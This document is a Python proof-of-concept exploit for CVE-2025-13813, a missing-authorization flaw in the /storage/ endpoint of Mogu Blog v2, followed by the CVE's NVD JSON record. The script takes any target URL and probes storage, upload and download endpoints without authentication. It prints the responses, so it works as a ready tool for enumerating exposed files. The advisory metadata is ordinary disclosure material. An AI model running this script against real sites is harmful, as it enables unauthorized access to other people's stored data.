CVE-2025-13813

# CVE-2025-13813 PoC - Mogu Blog v2 Missing Authorization in Storage Management # Affected Component: /storage/ endpoint # Vulnerability Type: Broken Access Control / Missing Authorization import requests import sys def check_vulnerability(target_url): """ Check if the target Mogu Blog instance is vulnerable to CVE-2025-13813 """ # Add trailing slash if not present if not target_url.endswith('/'): target_url += '/' # Target the storage management endpoint storage_endpoints = [ 'storage/', 'api/storage/', 'admin/storage/', 'storage/list', 'storage/files' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-13813: Mogu Blog v2 Storage Management Authorization Bypass") print("-" * 60) vulnerable = False for endpoint in storage_endpoints: url = target_url + endpoint print(f"\n[+] Testing endpoint: {url}") try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) print(f" Status Code: {response.status_code}") # Check for successful unauthorized access if response.status_code == 200: # Check response content for storage management interface if 'storage' in response.text.lower() or 'file' in response.text.lower(): print(f" [VULNERABLE] Endpoint accessible without authentication!") print(f" Response length: {len(response.text)} bytes") vulnerable = True # Try to enumerate files/directories if 'index' in response.text or 'list' in response.text: print(f" [INFO] Storage listing may be available") elif response.status_code == 401 or response.status_code == 403: print(f" [SAFE] Endpoint requires authentication") else: print(f" [INFO] Unexpected status code") except requests.exceptions.RequestException as e: print(f" [ERROR] Request failed: {str(e)}") return vulnerable def exploit_storage_access(target_url): """ Attempt to access storage management features without authorization """ if not target_url.endswith('/'): target_url += '/' print("\n[*] Attempting storage enumeration...") # Try various storage operations endpoints = { 'list': 'storage/', 'files': 'storage/files', 'upload': 'storage/upload', 'download': 'storage/download' } for op_name, endpoint in endpoints.items(): url = target_url + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] {op_name} endpoint accessible: {url}") print(f" Sample response: {response.text[:200]}...") except: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13813.py <target_url>") print("Example: python cve-2025-13813.py http://target.com") sys.exit(1) target = sys.argv[1] is_vulnerable = check_vulnerability(target) if is_vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-13813") print("[*] Running extended enumeration...") exploit_storage_access(target) else: print("\n[*] Target does not appear to be vulnerable")

{"cve": {"id": "CVE-2025-13813", "sourceIdentifier": "[email protected]", "published": "2025-12-01T07:16:01.493", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in moxi159753 Mogu Blog v2 up to 5.2. This issue affects some unknown processing of the file /storage/ of the component Storage Management Endpoint. The manipulation leads to missing authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mogublog_project:mogublog:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.2", "matchCriteriaId": "A6BBC198-704E-4815-A027-17BDF2902A11"}]}]}], "references": [{"url": "https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md#proof-of-concept", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.333822", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333822", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.692104", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}